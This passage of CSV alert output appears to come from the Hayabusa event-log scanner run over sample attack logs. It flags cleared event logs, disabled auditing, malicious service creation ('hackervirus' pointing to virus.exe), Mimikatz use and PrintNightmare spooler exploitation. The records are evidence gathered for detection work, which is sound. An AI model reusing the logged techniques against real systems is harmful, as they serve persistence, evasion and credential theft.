admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.622 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:21:02.504 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event 
Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows 
Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows 
Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 05:17:07.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc create hacker-testl3 binPath=""3virus.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x64c | User: admmig | LID: 0x123550",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service created (command).evtx +2021-10-26 05:23:34.575 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"New-Service -Name ""hackervirus"" -BinaryPathName '""virus.exe""'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx +2021-10-26 05:23:34.715 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is 
""System.Management.Automation.CommandNotFoundException"")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(""."", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx +2021-10-26 05:23:34.715 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Service): ""New-Service"" ParameterBinding(New-Service): name=""Name""; value=""hackervirus"" ParameterBinding(New-Service): name=""BinaryPathName""; value=""""virus.exe""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx +2021-10-26 05:23:34.715 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""The command $($lastError.TargetObject) was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type `"".\$($lastError.TargetObject)`"". 
See `""get-help about_Command_Precedence`"" for more details.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx +2021-10-26 05:23:34.715 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""hackervirus""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx +2021-10-26 05:23:34.736 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx +2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,LatMov | CredAccess,Mimikatz 
Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.403 
+09:00,fs03vuln.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:28:26.260 
+09:00,FS03.offsec.lan,354,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-27 19:35:56.899 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf08 | User: FS03$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\spoolsv.exe | LID: 
